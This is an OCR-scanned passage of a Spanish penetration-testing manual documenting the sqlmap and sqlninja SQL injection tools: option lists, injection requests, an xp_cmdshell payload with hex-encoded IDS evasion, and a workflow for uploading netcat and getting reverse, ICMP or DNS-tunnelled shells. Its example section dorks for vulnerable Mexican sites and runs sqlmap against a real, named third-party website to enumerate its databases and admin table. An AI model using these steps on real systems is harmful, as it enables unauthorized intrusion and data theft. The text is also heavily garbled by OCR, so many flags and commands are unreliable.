• Soporte para el escalado de privilegios de usuario del proceso de base de datos a través del 
comando getsystem de Metasploit que incluyen, entre otros, la técnica kitrapOd (MSI0-015). 

• Soporte para acceder (leer / agregar / eliminar) colmenas de registro de Windows. 

69.2. Escenario 

Detectar y explotar una inyección SQL 

Supongamos que está auditando una aplicación web y encontramos una página web que acepta 
valores dinámicos proporcionados por el usuario en los parámetros GET o POSE o los valores de 
HTTP Cookie o el valor del encabezado HTTP Elser-Agent. Ahora se desea probar si estos se ven 
afectados por una vulnerabilidad de inyección SQL y de ser asi, explotarlos para recuperar la mayor 



cantidad de información posible del sistema de administración de la base de datos de back-end de la 
aplicación web o incluso poder acceder al sistema de archivos subyacente y sistema operativo. 

En un mundo simple, considerar que la URL de destino es: 
http ://l 92.168.136.131/ sqlmap/mysql/get_int.php?id= 1 

Asumir que: 

http ://l 92.168.136.131/ sqlmap/mysql/get_int.php?id= 1+AND+1=1 
es la misma página que el original y : 

http ://l 92.168.136.131/ sqlmap/mysql/get_int.php?id= 1+AND+1 =2 

difiere del original, significa que se encuentra frente a una vulnerabilidad de inyección SQL en el 
parámetro id de GET de la página de la aplicación web index.php, lo que significa que 
potencialmente no hay IDS/IPS, ningún cortafuegos de aplicación web, ni la desinfección del valor 
de los parámetros se realiza en el lado del servidor antes de enviar la instrucción SQL al sistema de 
administración de la base de datos de fondo en el que se basa la aplicación web. 

Esto es una formma bastante común en las aplicaciones web de contenido dinámico y no depende 
del sistema de administración de la base de datos del servidor ni del lenguaje de programación de la 
aplicación web: es un aw de seguridad del código del programador. El Open Web Application 
Security Project de 2010 en su encuesta OWASP Top Ten, esta vulnerabilidad es una vulnerabilidad 
de las más comunes e importantes de una aplicación web junto con otros problemas de inyección. 

Volviendo al escenario, probablemente la instrucción SQL SELECT en get int.php tiene una 
sintaxis similar a la siguiente consulta SQL en pseudo código PHP: 

Squery = "SELECT [column(s) ñame] LROM [table ñame] WHERE id=" . $_REQUEST['id']; 

Como se puede ver, agregando cualquier otra condición SQL sintácticamente válida después de un 
valor para id, dicha condición tendrá lugar cuando la aplicación web pase la consulta al sistema de 
administración de la base de datos de fondo que la ejecuta, es por eso que la condición id = 1 AND 
1 = 1 es valid (Truc) y devuelve la misma página que la original, con el mismo contenido. Este es el 
caso de una vulnerabilidad de inyección SQL ciega basada en un valor boleano. Sin embargo 
sqlmap puede detectar cualquier tipo de inyección SQL y en consecuencia adaptar su flujo de 
trabajo en consecuencia. 

Además en este escenario simple y fácil de inyectar, también seria posible agregar, no solo una o 
más condiciones SQL válidas, sino también consultas SQL apiladas, por ejemplo, algo como 
[...] & id = 1; OTRA CONSULTA SQL # si la tecnología de la aplicación web admite consultas 
apiladas, también conocidas como declaraciones múltiples. 

Ahora que encontró este parámetro vulnerable de inyección SQL, puede explotarlo manipulando el 
valor del parámetro id en la solicitud HTTR 

Al pasar la dirección original, http://192.168. 136.131/sqlmap/mysql/get_int.php?id=l a sqlmap, la 
herramienta automáticamente: 

• Identifica los parámetros vulnerables; 

• Identifica que técnicas de inyección SQL se pueden utilizar para explotar los parámetros 
vulnerables; 

• Lingerprint del sistema de gestión de la base de datos de back-end; 

• Dependiendo de las opciones del usuario, imprimirá, enumerará datos o tomará el servidor 
de la base de datos como un todo. 


Conexión directa al sistema de administración de la base de datos 

Hasta la versión 0.8 de sqlmap, la herramienta ha sido otra herramienta de inyección SQL, utilizada 



por probadores de penetración de aplicaciones web. Las cosas avanzan y a medida que evolucionan, 
el sqlmap también. Ahora es compatible con esta nueva opción -d que permite conectarse desde su 
máquina al puerto TCP del servidor de la base de datos donde el deamon del sistema de 
administración de la base de datos está escuchando y realizar cualquier operación que realice 
mientras lo usa para atacar una base de datos a través de una vulnerabilidad de inyección SQL. 

69.3. Ejecución 

Uso: sqlmap [opciones] 

Opciones: 


-h, —help 

Mostrar el mensaje de ayuda básico y salir. 

-hh 

Mostrar el mensaje de ayuda avanzado y salir 

—versión 

Mostrar el número de versión del programa y salir. 

-V YERBOSE 

Nivel de detalle: 0-6. Valor predeterminado 1 


Objetivo: 

Al menos una de estas opciones se debe proporcionar para definir los objetivos 


-u URL, -url=URL 

URL de destino. Por ejemplo, "http://www.site. com/vuln.php?id=l" 

-g GOOGLEDORK 

Procesar los resultados de Google Dork como URL de destino 

-d DIRECT 

Conexión directa a la base de datos. 

-1 LIST 

Analizar los objetivos de registros proxy de Burp o WebScarab 

-r REQUESTFILE 

Cargar la solicitud HTTP desde un archivoOpciones de carga desde un 
archivo INI de configuración 

-c CONFIGFIEE 

Opciones de carga desde un archivo INI de configuración 


Solicitud: 


nes se pueden usar para esi 

íccificar como conectarse a la URL de destino 

—data=DATA 

Cadena de datos a enviar a través de POST 

—cookie=COOKIE 

Valor del encabezado de la HTTP Cookie 

—cookie-urlencode 

URL encode generado en las inyecciones de cookies 

—drop-set-cookie 

Ignorar el encabezado Set-Cookie de la respuesta 

—user-agent=AGENT 

Valor del encabezado de HTTP User-Agent 

—random-agent 

Utilizar el valor de encabezado HTTP usuario-agente 
seleccionado al azar 

—referer=REFERER 

Utilizar el valor de encabezado HTTP Referer 

-headers=HEADERS 

Encabezados extra HTTP separados por salto de linea 

—auth-type=ATYPE 

Tipo de autenticación HTTP (Basic, Digest o NTLM) 

—auth-cred=ACRED 

Credenciales de la autenticación HTTP 
(nombre: c ontraseña) 

—auth-cert=ACERT 

Certificado de autenticación HTTP (key file, cert file) 

—proxy=PROXY 

Usar un proxy para conectarse a la URL de destino 

—proxy-cred=PCRED 

Credenciales de la autenticación del proxy HTTP 







(nombre: c ontraseña) 

—ignore-proxy 

Ignorar el proxy HTTP predeterminado del sistema 

-delay=DEEAY 

Retraso en segundos entre eada solieitud HTTP 

—timeout=TIMEOEÍT 

Segundos a esperar antes de la eonexión de tiempo de 
espera. Predeterminado 30 

—retries=RETRIES 

Reintentos euando se agota el tiempo de espera de la 
eonexión. Predeterminado 3 

—scope=SCOPE 

Regexp para fdtrar objetivos del registro proxy 
proporcionado 

—safe-url=SAEEÍRL 

Dirección de TÍRE para visitar eon freeuencia durante 
las pruebas 

—safe-freq=SAEREQ 

Probar solieitudes entre dos visitas a una TIRE segura 
determinada 

—tor 

Utilizar la red de anonimato de Tor. 

—eheek-tor 

Comprobar si Tor se utiliza correetamente 


Optimización: 

Estas opcio nes se puden usar para optimizar el rendimiento del sqlmap 


-0 

Aetivar todas las opeiones de optimizaeión 

—prediet-output 

Predeeir salida de eonsultas eomunes 

—keep-alive 

Usar conexiones HTTP persistentes 

—null-eonneetion 

Reeupere la longitud de la página sin el cuerpo de 
respuesta HTTP real 

-threads=THREADS 

Número máximo de solieitudes HTTP (s) eoneurrentes 
Predeterminado 1 


Inyeeeión: 

Estas opeiones se pueden usar para espeeificar que parámetros probar, proporeionar eargas útiles de 
iny eeeión personalizadas y Scripts de manipulación opeionales _ 


-p TESTPARAMETER 

Parámetros verifieables 

-dbms=DBMS 

Eorzar el baek-end DBMS a este valor 

-os=OS 

Eorzar el sistema operativo del baek-end DBMS a este valor 

-prefix=PREEIX 

Cadena de prefijo de la payload de inyeeeión 

-suffix=SUEEIX 

Cadena de sufijo de la payload de inyección 

—tamper=TAMPER 

Use los seripts dados para manipular los datos de inyeeeión 


Detección: 

Estas opciones se pueden usar para personalizar la fase de deteeeión 


-level=EEVEE 

Nivel de pruebas a realizar (1-5) Por defeeto 1 

-risk=RISK 

Riesgo de pruebas a realizar (0-3) Por defeeto 1 

—string=STRING 

Cadena para que eoineida en la página euando la eonsulta 
es válida 







—regexp=REGEXP 

Regex para que coineida en la página cuando la consulta 
es válida 

—text-only 

Compara páginas basadas solo en el contenido textual 


Técnicas: 

Estas opciones se pueden usar para modifiear las pruebas de téenieas de inyeeción de SQL 
especificas 


—teehnique=TECH 

Téenieas de inyección SQL a usar. 

Por defecto "BEUSTQ" 

—time-see=TIMESEC 

Segundos para retrasar la respuesta DBMS 
(predeterminado 5) 

—union-cols=UCOLS 

Rango de eolumnas a probar la inyección SQL de 
eonsultas UNION 

—unión-ehar=UCHAR 

Carácter a utilizar para el número de columnas de 
fuerza bruta 


Enumeración: 

Estas opciones se pueden usar para enumerar la información, la estructura y los datos del sistema de 
administraeión de la base de datos de back-end que se eneuentran en las tablas. Además se pueden 
ejecutar las propias sentencias SQL. 


-a, —all 

Recuperarlo todo 

-b, —banner 

Recuperar el banner DBMS 

—current-user 

Recuperar el usuario actual DBMS 

—current-db 

Recuperar la base de datos actual DBMS 

—is-dba 

Detectar si el usuario aetual de DBMS es DBA 

—users 

Enumerar los usuarios DBMS 

—passwords 

Enumerar los hashes de contraseña de los usuarios de DBMS 

—privileges 

Enumerar los privilegios de los usuarios DBMS 

—roles 

Enumerar los roles de los usuarios DBMS 

—dbs 

Enumerar las bases de datos DBMS 

—tables 

Enumerar las tablas de bases de datos DBMS 

—columns 

Enumerar las eolumnas de la tabla de base de datos DBMS 

—sehema 

Enumerar el esquema DBMS 

—dump 

Volcar las entradas de la tabla de base de datos DBMS 

—dump-all 

Volcar todas las entradas de tablas de bases de datos DBMS 

-D DB 

Base de datos DBMS a enumerar 

-T TBL 

Tabla(s) de base de datos DBMS para enumerar 

-C COL 

Columna(s) de la tabla de base de datos DBMS para enumerar 

-U USER 

Usuario DBMS a enumerar 

—exelude-sysdbs 

Exeluir bases de datos del sistema DBMS al enumerar tablas 

-start=LIMITSTART 

Primera entrada de salida de consulta a recuperar 





-stop=EIMITSTOP 

Última entrada de salida de consulta a recuperar 

-first=EIRSTCHAR 

Primer carácter de palabra de salida de consultaa recuperar 

-last=EASTCHAR 

Último carácter de palabra de salida de consulta a recuperar 

—sql-query=QElERY 

Sentencia SQE a ejecutar 

—sql-shell 

Solicitar un shell de SQE interactivo 


Fuerza bruta: 

Estas opciones se pueden usar para realizar las comprobaciones de fuerza bruta. 


—common-tables 

Verificar la existencia de tablas comunes 

—common-columns 

Verificar la existencia de columnas comunes 


Inyección de función definida por el usuario: 

Estas opciones se pueden usar para crear funciones a medidad definidas por el usuario. 


—udf-inject 

Inyectar funciones personalizadas definidas por el usuario 

—shared-lib=SHEIB 

Ruta local de la biblioteca compartida. 


Acceso al sistema de ficcheros: 

Estas opciones se pueden usar para acceder al sistema de ficheros subtacente al sistema de 
administración de la base de datos back-end. 


—file-read=REIEE 

Eeer un archivo del sistema de archivos DBMS de back-end 

—file-write=WEIEE 

Escribir un archivo local en el sistema de archivos DBMS 
de back-end 

-file-dest=DEIEE 

Ruta de archivo absoluta de DBMS de back-end a escribir 


Acceso al sistema operativo: 

Estas opciones se pueden utilizar para acceder al sistema operativo subyacente del sistema de 
administración de bases de datos back-end. 


—os-cmd=OSCMD 

Execute an operating system command 

—os-shell 

Solicitar un shell de sistema operativo interactivo 

—os-pwn 

Solicitar un shell OOB, Meterpreter o VNC 

—os-smbrelay 

One click prompt for an OOB shell, meterpreter or VNC 

—os-bof 

Stored procedure bufíbr overflow exploitation 

—priv-esc 

Database process' user privilege escalation 

-msf-path=MSEPATH 

Eocal path where Metasploit Eramework 3 is installed 

—tmp-path=TMPPATH 

Remóte absolute path of temporary files directory 


Acceso al registro de Windows: 

Estas opciones se pueden usar para acceder al registro de Windows del sistema de administración de 
la base de datos back-end. 


—reg-read 


Eeer un valor de clave de registro de Windows 








-reg 

-add 

Escribir un dato de valor de clave de registro de Windows 

-reg 

-del 

Eliminar un valor de clave de registro de Windows 

—reg-key=REGKEY 

Establecer la clave de registro de Windows 

-reg 

-value=REGVAL 

Establecer el valor de clave de registro de Windows 

-reg 

-data=REGDATA 

Establecer el valor de los datos de la clave de registro de 
Windows 

—reg-type=REGTYPE 

Establecer el valor del tipo de la clave de registro de 
Windows 

eral: 

s opciones pueden usarse i 

para establecer algunos parámetros de trabajo generales 


-t TRAFEICEIEE 

Registrar todo el tráfico HTTP en un archivo de texto 


-s SESSIONEILE 

Guardar y reanudar todos los datos recuperados en un 
archivo de sesión 


—flush-session 

Vaciar archivos de sesión para el objetivo actual 


—fresh-queries 

Ignorar los resultados de la consulta almacenados en el 
archivo de sesión 


—eta 

Mostrar para cada salida el tiempo estimado de llegada 


—update 

Actualizar sqlmap 


—save 

Guardar las opciones en un archivo INI de configuración 


—batch 

Nunca pedir la entrada del usuario 

Usar el comportamiento predeterminado 


Varios: 


—beep 

Alertar cuando se encuentra la inyección sql 

—check-payload 

Pruebas de detección de IDS de payloads de inyección 

—cleanup 

Eimpie el DBMS mediante UDF y tablas especificas de 
sqlmap 

—forms 

Analizar y probar formularios en la URL de destino 

—gpage=GOOGEEPAGE 

Usa los resultados de Google Dork del número de página 
especificado 

—page-rank 

Mostrar el rango de página (PR) para los resultados de 
Google Dork 

—parse-errors 

Analizar los mensajes de error DBMS de páginas de 
respuestas 

—replicate 

Replicar los datos volcados en una base de datos sqbteS 

—tor 

Utilice la dirección proxy predeterminada de Tor 
(Vidalia / Privoxy / Polipo) 

—wizard 

Interfaz de asistente simple para usuarios principiantes 


Ejemplo 

Primero hemos de encontrar sitios vulnerables que se pueden encontrar con Google Dork, como 
ejemplo 






site .mx inurl .php?id= 

Para hacerlo con sqlmap, la sintaxis es 

sqlmap -q “site:mx inurl:php?id=” 

Primero ejecutemos 

sqlmap -u www.bible-history.com/subcat.php?id=2 —level 5 —risk 
Si ha encontrado vulnerabilidades, ejecutaremos 
sqlmap -u www.bible-history.com/subcat.php?id=2 —dbs 
para conocer las caracteristicas de la base de datos atacada. 

Si vemos que hay una base de datos keywords, para ver su contenido, ejecutaremos 

sqlmap -u www.bible-historv.com/subcat.php?id=2 -D keywords —tables 

Si ahora hay una tabla admin, para ver su contenido, ejecutariamos 

sqlmap -u www.bible-historv.com/subcat.php?id=2 -D keywords -T admin —columns 

Si queremos ver los privilegios de los usuarios, ejecutariamos 
sqlmap -u www.bible-history.com/subcat.php?id=2 -dbs —privileges 







70. Sqlninja 


Sqlninja es una herramienta diseñada para explotar las vulnerabilidades de inyección de SQL en una 
aplicación web que utiliza Microsoft SQL Server como servidor de fondo. Su objetivo principal es 
proporcionar un acceso remoto en el servidor de base de datos vulnerable, incluso en un entorno 
muy hostil. Los evaluadores de penetración deben utilizarlo para ayudar y automatizar el proceso de 
toma de control de un servidor de base de datos cuando se descubre una vulnerabilidad de inyección 
de SQL. 

El objetivo principal de Sqlninja es obtener acceso interactivo a nivel del sistema operativo en el 
servidor de base de datos remoto y usarlo como punto de apoyo en la red de destino. Como 
caracteristica experimental, también puede extraer datos de la base de datos. 

Sus caracteristicas principales son: 

• Huella digital del servidor SQL remoto (versión, usuario que realiza las consultas, 
privilegios de usuario, disponibilidad de xp cmdshell, modo de autenticación del servidor 
de base de datos) 

• Fuerza bruta de la contraseña ’sa' (solo SQL Server 2000) 

• Escalada de privilegios a ’sa' (solo SQE Server 2000) 

• Creación de un xp cmdshell personalizado si el original ha sido deshabilitado 

• Subida de ejecutables 

• Escaneo inverso para buscar un puerto que pueda usarse para un shell inverso 

• Shell directo e inverso, tanto TCP como UDP 

• Pseudoshell tune tizado DNS, cuando no hay puertos disponibles para un bindshell 

• Shell tunelizado ICMP, si el DBMS objetivo puede comunicarse a través de ICMP Echo con 
la máquina atacante 

• Metasploit wrapping, cuando desea utilizar Meterpreter o incluso desea obtener acceso a la 
GUI en el servidor de base de datos remoto 

• Escalada de privilegios del sistema operativo en el servidor de base de datos remoto 
mediante secuestro de tokens o mediante CVE-2010-0232 

• Extracción de datos de la base de datos remota, utilizando inferencia basada en WAITFOR o 
túneles basados en DNS 

• Todo lo anterior se puede hacer con código SQE ofuscado, para confundir los sistemas IDS / 
IPS 

Uso: sqlninja 
Opciones 

Es obligatorio la especificación de un modo. 


-m <mode> 

Se detallan a continuación 

-f<fde> 

Fichero de configuración. Por defecto: sqlninja.conf 

-p <password> 

Contraseña 

-w <wordlist> 

Eista de palabras a usar en el modo de fuerza bruta con diccionario 

-g 

Generar script de depuración y salir. Solo válido en el modo upload 

-V 

Modo verbose 

-d <mode> : 

Activar depuración 

1 - imprimir cada comando inyectado 




2 - imprimir cada solicitud HTTP en bruto 

3 - imprime cada respuesta HTTP en bruto 
all - todo lo anterior 


70.1. Modos 


t/test 

Probar si fúnciona la inyección 

f/fingerprint 

Lingerprint user, xp cmdshell y más 

b/bruteforce 

Cuenta de fuerza bruta 

e/escalation 

Agregar usuario a la fúnción de servidor sysadmin 

x/resurrectxp 

Tratar de reerear 

xpcmdshell 


u/upload 

Subir un fichero .ser 

s/dirshell 

Iniciar un shell directo 

k/backscan 

Buscar un puerto de salida abierto 

r/revshell 

Iniciar un shell inverso 

d/dnstunnel 

Intentar un shell dn tunelizada 

i/iempshell 

Iniciar un shell inverso ICMP 

c/sqlemd 

Emitir un comando OS 'ciego' 

m/metasploit 

Envolver los actores Metasploit 


70.2. Fichero de configuración 

El archivo de eonfiguraeión, predeterminado; sqlninj a.conf, controla la mayoría del 
comportamiento de sqlninja. Todas las opciones tienen la forma: option name = option value 
La única excepción es httprequest, que define la solicitud HTTP y el punto de inyección y que 
abarca varias lineas. 

Las opeiones se pueden dividir aproximadamente en las siguientes categorías: 

• Básico: se usa para configurar el ataque 

• Extracción de datos: se usa para configurar el modo de extracción de datos 

• Avanzado: se utiliza para ajustes adicionales 

En la mayoría de los casos, las opciones distinguen entre mayúsculas y minúsculas, por ejemplo, los 
valores de URL. La misma opeión se puede usar varias veces, pero usará la última declaraeión, 
anulando las anteriores. Los comentarios están permitidos en eualquier lugar excepto entre 
—httprequest start— y —httprequest end— y están precedidos por el carácter '#'. 

Opciones básicas 
httprequest 

A partir de la versión 0.2.6, sqlninja usa una nueva forma de configurar la solicitud HTTP y la 
cadena de inyección relativa. En lugar de parámetros separados para el dispositivo, el puerto, la 
página, el método HTTP, la eadena de explotación y los encabezados adicionales, la solicitud HTTP 
completa se especifica a la vez, con un marcador, por defecto_SQL2INJECT_, que indica donde 





deben inyectarse los comandos SQL. Esto simplifica mucho las cosas y lo que es más importante, 
permite una libertad total en el lugar donde puede estar el vector de inyección; ahora no está 
limitado a un parámetro GET o POSE, puede inyectar donde se necesite, por ejemplo en una cookie. 
Sqlninja considerará como solicitud HTTP todo lo que está incluido entre las lineas 
—httprequeststart— y —httprequestend—. 

En general, se deben incluir los siguientes elementos: 

• El método HTTP, generalmente POST o GET 

• Ea URL completa de los recursos, incluidos http:// o https:// 

• El puerto, si no es estándar, por ejemplo: http: // www.victim.com: 8080 

• Ea versión HTTP 

• Todos los encabezados necesarios 

• El cuerpo después de una linea vacia, si la solicitud usa POST 

En general la mejor estrategia es usar un proxy, por ejemplo Burpsuite, para interceptar la solicitud 
que desencadena la inyección SQL y copiarla en sqlninj a.conf 

Por ejemplo, una inyección basada en GET sobre texto plano HTTP se verá asi: 

—httprequest_start— 

GET http://www. victim.com/page. asp?string_param=aaa';_SQE2INJECT_&other_param=blah 

HTTP/1 .1 

Host: www.victim.com 

User-Agent: Mozilla/5.0 (XI 1 ; U; Einux i686; en-US; rv:l .7.1 3) Gecko/2006041 8 Eirefox/l .0.8 
Accept: 

text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/* 
Accept-Language: en-us,en;q=0.7,it;q=0.3 
Accept-Charset: ISO-8859-1 5,utf-8;q=0.7,*;q=0.7 
Connection: cióse 
—httprequestend— 

En el caso de una inyección basada en POST sobre HTTPS probablemente se verá de la siguiente 
manera: 

—httprequeststart— 

POST https://www.victim.com/page.asp HTTP/1 .0 
Host: www.victim.com 

User-Agent: Mozilla/5.0 (XI 1 ; U; Einux i686; en-US; rv:l .7.1 3) Gecko/2006041 8 Eirefox/l .0.8 
Accept: 

text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/* 

Accept-Eanguage; en-us,en;q=0.7,it;q=0.3 

Accept-Charset: ISO-8859-1 5,utf-8;q=0.7,*;q=0.7 

Content-Type: application/x-www-form-urlencoded 

Cookie: ASPSESSIONID=xxxxxxxxxxxxxxxxxxxx 

Connection: cióse 

numeric_param=l 2;_SQE2INJECT_ 

—httprequestend— 

Tener en cuenta el encabezado Content-Type y la linea vacia entre los encabezados y el cuerpo. 
También que el encabezado Content-Eength no está incluido: sqlninja calculará el valor apropiado y 
agregará el encabezado automáticamente. 




Finalmente, una inyeeeión basada en cookies se verá así: 


—httprequeststart— 

GET http://www.vietim.com:8080/page.asp?paraml =aaa&m2=blah HTTP/1 .0 
Host: www.vietim.com 

User-Agent: Mozilla/5.0 (XI 1 ; U; Linux i686; en-US; rv:l .7.1 3) Gecko/2006041 8 Firefox/1 .0.8 
Accept: 

text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/* 
Accept-Language: en-us,en;q=0.7,it;q=0.3 
Accept-Charset: ISO-8859-1 5,utf-8;q=0.7,*;q=0.7 
Cookie: ASPSESSIONID=xxxxx'%3B_SQL2INJECT_ 

Connection: cióse 
—httprequestend— 

Observar como el punto y la coma después del apostrofe se ha codificado como %3B: esto se debe a 
que de lo contrario, el servidor analizaría el punto y la coma como un separador entre las diferentes 
cookies. 

Antes del marcador_SQL2INJECT_, se debe incluir todo lo necesario para cerrar la consulta 

original e iniciar una nueva, como el parámetro vulnerable y la secuencia de caracteres que permite 
comenzar a inyectar comandos. Esto significa: 

1. El parámetro vulnerable (nombre + valor) 

2. Lina comilla simple si el parámetro es una cadena 

3. Eln punto y una coma para finalizar la consulta original 

También debe incluir todo lo necesario para cerrar correctamente la consulta original, como un 
número apropiado de corchetes de cierre. Por ejemplo si se desea inyectar el siguiente comando 
SQL: paraml=l&m2=x' ) ) ; exec+master. . xp_cmdshell+' dir+c: ' 

La solicitud HTTP en el archivo de configuración debe contener lo siguiente: 
paraml=l&m2=x' ) ) ;_SQL2INJECT_ 

Cosas importantes a recordar: 

• En general, una buena técnica es replicar lo más posible la solicitud HTTP que se usó para 
detectar originalmente la falla de inyección SQL con un navegador web u otra herramienta, 
ya que en algunos casos extremos, un encabezado ligeramente diferente puede marcar una 
gran diferencia. La única modificación sugerida y generalmente segura es usar HTTP/1.0 
para evitar problemas con las conexiones que permanecen abiertas. 

• Con el fin de brindarle todo el poder y la flexibilidad para crear el exploit, sqlninja no 
modificará la solicitud HTTP aparte obviamente del código a inyectar donde está el 
marcador, pero también significa que no intentará corregir su sintaxis, así que asegúrarse de 
que su solicitud HTTP sea correcta incluida toda la codificación de URL necesaria. 

• A veces es posible que también se necesite agregar más código SQL después de la consulta 
inyectada y por lo tanto después del marcador. Por lo general esto no es necesario, ya que 
sqlninja simplemente agrega 2 guiones y comenta el resto de la consulta original, pero hay 
algunos casos en los que necesita agregar código SQL adicional para que las consultas por 
lotes funcionen correctamente. En este caso no olvidar establecer también la línea 
appendcomment = no, de lo contrario se agregarán los 2 guiones y el código SQL 
especificado aquí se considerará un comentario. 

• Si se está inyectando en una cookie y se necesita un punto y coma para cerrar la consulta 
original, codificarla como % 3B, de lo contrario se analizará como el final del valor de la 
cookie. 



• No dejar espacios al comienzo de cada linea 

• No dejar lineas de comentario, ya que serian analizadas como parte de la solicitud 

• Si no especifica el puerto al que conectarse, sqlninja asumirá el 80 para HTTP y el 443 para 
HTTPS 

Para faciltar las sintaxis correctas, se recomienda emplear Burpsuite donde se pueden visualizar las 
solicitudes y las respuestas y a continuación hacer un copiar y pegar en este fichero de 
configuración. 

proxyhost 

En el caso de que sea necesario un proxy HTTP para conectarse al host de destino. Por ejemplo: 
proxyhost = 192.168.1.233 

proxyport 

Puerto del proxy HTTP al que conectarse. Por defecto 8080. Por ejemplo: proxyport = 3128 

domain 

El dominio o subdominio controlado del atacante que se utilizará con el modo dnstunnel y el modo 
de extracción de datos basado en DNS. Ea dirección IP desde la que se inicia sqlninja debe ser el 
servidor DNS autorizado para este dominio. Por ejemplo: domain = sqlninja.net 

msfpath 

Ea ruta absoluta de los ejecutables de Metasploit msfpayload y msfcli. No se necesita esto si ya 
están en su ruta predeterminada. Por ejemplo: msfpath = /home/icesurfer/tools/framework-3. 1 

evasión 

sqlninja puede usar algunas técnicas de evasión, para confundir y evitar IPS/IDS basados en firmas. 
Actualmente se implementan 4 técnicas, que se pueden combinar libremente: 

1. Consulta de codificación hexadecimal: la consulta está codificada en hexadecimal antes de 
ejecutarse 

2. Comentarios como separadores: todos los espacios están sustituidos por la cadena / ** / 

3. Caso aleatorio 

4. Codificación aleatoria de URI 

Se pueden combinar todas las técnicas junto con la opción: evasión = 1234 
Esto generará un código bastante criptico, como el siguiente: 

%64EC1%41 RE%2E%2A%2A%2E%40%61 %2E%2A%2A%2E%76Ar 

%63%48aR288000%29%2E%2A%2A%2E%73 

ET%2E%2A%2A%2E%40A%3D 

%30%586%35786%3563%3206d617%33746%35%372%32e2%457870%35E63 

6d647368%36%35%36%63%36c2%302%37636D%3642%30%32f 

%34320%37%3069%36%65%36720%331% 

332372E%330%32E3%30%32%45%3312%373b%2E%2A%2A%2EeX%65%43%2E%2A%2A 

%2E%28%40A%29 

Por defecto sqlninja establece la evasión en cero y no se utilizará ninguna técnica de evasión. 

La primera técnica es particularmente útil. Por ejemplo, si queremos inyectar el siguiente comando: 
exec master. . xp cmdshell' cmd /C ping 127. 0. 0. 1' 

La consulta actual será: 
declare @a varchar(8000) set 

@a=0x65786563206d61737465722e2e78705f636d647368656c6c2027636d64202f432070696e672 



03132372e302e302e31273b 
exec (@a) 

Una cadena muy larga, pero observar que; 

• No hay eomandos SQL excepto DECLARE y EXEC, así que adiós IPS si está buseando 
xp emdshell y similares 

• No hay tampoeo eomillas simples. Por lo tanto esta téenica de evasión es extremadamente 
útil si encuentra un parámetro numérieo vulnerable y se filtran las eomillas simples 

Evitar usar ofuscación innecesaria si se están utilizando solieitudes GET, ya que esto podría 
eondueir a URL que son demasiado largas y que el servidor web no analiza eorreetamente. 

msfencoder 

El eodificador que se utilizará con Metasploit. Si no se espeeifiea, no se realiza ninguna 
eodifieaeión, sin embargo siempre se reeomienda un buen eodifieador. Por ejemplo: 
msfeneoder = x86/shikata_ga_nai 

uploadmethod 

El método a utilizar para eargar arehivos binarios. Eos valores posibles son depuraeión o vbseript 
eomo predeterminado. Por ejemplo: upload method = vbseript 

703. Modos de ataque 

sqlninja tiene aetualmente 14 modos de ataque y el modo a utilizar se puede espeeifiear por su 
nombre; sqlninja -m upload o por su abreviatura: sqlninja -m u 

Ea lista con los modos disponibles y sus aeeesos direetos eorrespondientes se puede reeuperar 
inieiando sqlninja sin parámetros. 

Una forma típiea de usar sqlninja es: 

1. Configurar el arehivo de configuraeión y usar el modo test para verifiear que el eódigo SQE 
se esté inyeetando eorreetamente 

2. Eingerprint del servidor de base de datos remoto, utilizando el modo fmgerprint 

3. Si es neeesario, usar el modo de fuerza bruta para eneontrar la contraseña ’sa' y esealar 
privilegios. Solo SQL Server 2000. 

4. Si es neeesario, usar el modo resurreetxp para volver a erear el proeedimiento extendido 
xp emdshell. Solo SQL Server 2000 

5. Subir netcat usando el modo upload 

6. Si es posible contaetar eon el servidor de la base de datos en algún puerto, usar el modo 
dirshell y obtener un shell direeto. Si el puerto es TCP, usar el modo metasploit para obtener 
aeeeso gráfieo. De lo eontrario, utilizar el modo baeksean para eneontrar un puerto 
TCP/UDP permitido. 

7. Si el paso anterior es exitoso, usar el modo revshell para obtener un shell inverso. Si el 
puerto es TCP, usar el modo metasploit para obtener aeeeso gráfieo. 

8. Si el paso anterior falló, eargar iempsh.exe y probar el modo iempshell para obtener un shell 
con túnel ICMP 

9. Si el paso anterior falló, eargar dnstun.exe e inieiar el modo dnstunnel para obtener un 
pseudo-shell eon túnel DNS 

10. Si el paso anterior falla, eneender el modo getdata y eomienza a extraer algunas tablas. 


t/test 

Sin parámetros. 



Este modo simplemente inyeeta un WAITFOR DELAY simple y eomprueba si el servidor remoto lo 
ejeeuta eon éxito. Elsar este modo para probar si el archivo de configuración es correcto y la 
inyección está funcionando. 

f/fingerprint 

Parámetros: -p <sa password> (opcional) 

Con la inyección ciega basada en WAITEOR, este modo toma las huellas digitales del servidor 
remoto y se puede obtener la siguiente información: 

• Versión de la base de datos 

• Usuario que realiza las consultas 

• Si este usuario pertenece al grupo sysadmin 

• Si xp cmdshell está disponible para este usuario 

• Si el servidor remoto usa autenticación mixta o solo de Windows. Necesita saber esto si 
desea forzar la contraseña ’sa' 

• Si el servidor SQL remoto se ejecuta como SYSTEM. Esto también se puede usar para 
verificar si el programa churrasco.exe se ha subido correctamente y si puede escalar los 
privilegios mediante el secuestro de tokens. 

• Nombre de la base de datos actual 

Si se está atacando SQL Server 2000, el usuario actual de la base de datos no pertenece al grupo 
sysadmin, pero la contraseña ’sa' correcta se especifica como parámetroy se realiza el fingerprinting 
derechos administrativos. La técnica WAITFOR es mucho más lenta en comparación con otros 
métodos de inferencia, pero es la más flexible. Sin embargo dado que los factores externos como el 
tráfico de red y la carga del servidor podrian interferir con las mediciones de tiempo, es posible que 
se desee repetir el fingerprinting si el primer resultado no parece correcto, o jugar con el parámetro 
de tiempo en el archivo de configuración Tener en cuenta que para usar el fingerprint del usuario 
que ejecuta SQL Server, debe estar disponible en el cuadro remoto lo siguiente: 

• xp cmdshell o un procedimiento equivalente 

• whoami.exe. Esto está presente de manera predeterminada en Windows 2003, pero si se 
sospecha que esta utilidad no está en el dispositivo remoto, simplemente descargarla de 
microsoft.com y subirla. 

b/bruteforce 

Parámetros: -w <wordlist> (opcional) 

Este modo se debe utilizar si el usuario que realiza las consultas no pertenece al grupo sysadmin. En 
este caso se necesita escalar privilegios. Dado que al usar OPENROWSET se puede hacer que la 
base de datos de destino se conecte a si misma con credenciales alternativas, se puede intentar 
forzar la contraseña ’sa'. Si se encuentra la contraseña correcta, el usuario actual se agrega 
automáticamente al grupo sysadmin. Para que este ataque funcione, el servidor SQL remoto debe 
